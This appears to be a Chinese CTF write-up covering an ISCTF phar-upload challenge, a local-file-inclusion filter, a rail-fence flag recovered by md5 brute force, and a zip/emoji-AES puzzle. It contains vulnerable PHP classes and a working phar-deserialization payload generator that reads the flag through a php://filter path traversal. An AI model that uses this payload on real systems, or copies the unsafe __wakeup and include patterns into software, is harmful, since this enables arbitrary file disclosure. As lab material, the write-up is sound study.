upload,一道phar文件上传题目
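class upload{
    // Request-scoped upload handler: every field below is filled straight
    // from $_FILES["file"] in the constructor.
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        // Filename is stored exactly as the client sent it (no basename()),
        // and that raw value is what file_exists()/move() operate on later.
        $this->filename = $_FILES["file"]["name"];
        // Extension = text after the last dot. end() takes its argument by
        // reference, so explode()'s result goes into a variable first;
        // passing it inline raises "Only variables should be passed by reference".
        $parts = explode(".", $_FILES["file"]["name"]);
        $this->ext = end($parts);
        // Size in KiB (int/int stays int when exact).
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");// restricts the allowed extensions
    }

    public function start(){
        return $this->check();
    }

    private function check(){
        // Existence is tested before the extension check, so file_exists()
        // sees the raw client filename whatever its extension. file_exists()
        // resolves stream wrappers (phar:// included), which is the
        // deserialization trigger this writeup relies on; constraining the
        // value to a fixed directory would close that path.
        if(file_exists($this->filename)){
            return "Image already exsists";
        }elseif(!in_array($this->ext, $this->Valid_ext, true)){ // strict: both sides are strings
            return "Only Image Can Be Uploaded";
        }else{
            return $this->move();
        }
    }

    private function move(){
        // Stored under upload/ with the client-supplied name; the extension
        // check above is the only gate.
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
        return "Upload succsess!";
    }

    public function __wakeup(){
        // Runs on unserialize(). With $filename under attacker control (e.g.
        // phar metadata) this reads and echoes an arbitrary path or stream
        // wrapper; a __wakeup() should not perform I/O driven by its own
        // properties.
        echo file_get_contents($this->filename);
    }
}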
-
-
class check_img{
    // Image name to look up; taken directly from the query string.
    public $img_name;

    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    public function img_check(){
        // file_exists() on a client-controlled value resolves stream wrappers
        // as well as plain paths, which is why a phar:// value can be
        // triggered from here. Resolving against a fixed directory
        // (realpath() plus prefix check) would restrict it.
        $present = file_exists($this->img_name);
        return $present ? "Image exsists" : "Image not exsists";
    }
}
public function __wakeup(){
echo file_get_contents($this->filename);
}这一段可以看出 __wakeup 中调用了 file_get_contents,可以借助 phar 反序列化来触发,然后我们构造就可以
// Payload generator from the writeup. The stub class only needs the property
// name that the target's __wakeup() reads; on unserialize() the target's own
// `upload` class is instantiated and its __wakeup() runs with this $filename.
class upload{
    public $filename;
}
$a = new upload();
// The value __wakeup() hands to file_get_contents().
$a->filename="php://filter/read=convert.base64-encode/resource=../../../../flag";
$phar = new Phar('aaaaaaa.phar');
$phar->startBuffering();
// Stub starting with GIF89a, so the archive begins like a GIF image.
$phar->setStub('GIF89a'.'');
// The object is serialized into the archive's metadata; reading the archive
// through the phar:// wrapper is what deserializes it. Defender note: not
// calling file functions on user-supplied paths, or disabling the phar
// stream wrapper, prevents this trigger.
$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();
?>
也就是路径这里麻烦一点
扫描目录扫到一个www.rar
// Front-controller excerpt recovered from www.rar (lines 2-13 of the
// original file): includes whatever page ?file= names.
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if (isset($file)) {
    // Denylist filter: rejects "flag", ".." and "//" (case-insensitive).
    // Anything not on the list passes, so stream wrappers such as php://
    // or phar:// are not stopped here; an allowlist of known page names
    // would be the robust check.
    if (preg_match("/flag|\.\.|\/\//i", $file)) {
        echo "no hack";
        exit();
    }
    // include of a client-chosen path: local file inclusion.
    include $file;
} else {
    include("upload.php");
}
- g0at无意间发现了被打乱的flag:I{i?8Sms??Cd_1?T51??F_1?}
- 但是好像缺了不少东西,flag的md5值已经通过py交易得到了:88875458bdd87af5dd2e3c750e534741
I{i?8Sms??Cd_1?T51??F_1?}
因为题目提交的flag格式为 ISCTF{},可以看出用的是栅栏密码
栏数为5,然后需要爆破得到flag。本来直接套了7层循环,呃呃呃太大了跑不出来;看见了一个师傅写的脚本真的想不到,但是也有一个局限性,必须未知位都是数字才可以使用
// Brute force of the unknown digit groups of the flag: every candidate
// ISCTF{md5_is_11<2 digits>1<2 digits>8<3 digits>} is hashed and compared
// with the known md5. The zero padding relies on PHP's string increment:
// after '0'.$i the counter is a numeric string such as '09', which $i++
// turns into '10', and the loop condition still compares it numerically.
// Note the bounds (<99, <999) exclude 99 and 999 themselves.
for($i = 0;$i<99;$i++){
    // If the string length is 1, pad one leading 0
    if(strlen($i)==1){
        $i ='0'.$i;
    }
    for($b = 0;$b<99;$b++){
        // If the string length is 1, pad one leading 0
        if(strlen($b)==1){
            $b ='0'.$b;
        }
        for($c = 0;$c<999;$c++){
            // If the string length is 1, pad two leading 0s
            if(strlen($c)==1){
                $c ='00'.$c;
            // If the string length is 2, pad one leading 0
            }else if(strlen($c)==2){
                $c ='0'.$c;
            }
            $num = "ISCTF{md5_is_11".$i.'1'.$b.'8'.$c.'}';
            // Loose == between two strings; === would sidestep PHP's
            // numeric-string comparison rules (no effect here, since the
            // constant is not a numeric string).
            if("88875458bdd87af5dd2e3c750e534741"==md5($num)){
                echo '密码为'.$num;
            }

        }
    }
}
下载的文件需要解压,而且有解压密码
根据提示进行爆破,前三个是KEY,后面五个字符为字母
解压出的文件都是 emoji 表情包,然后进行 emoji-aes 解密
然后根据 KEYISAES 可知密钥是 AES
获得flag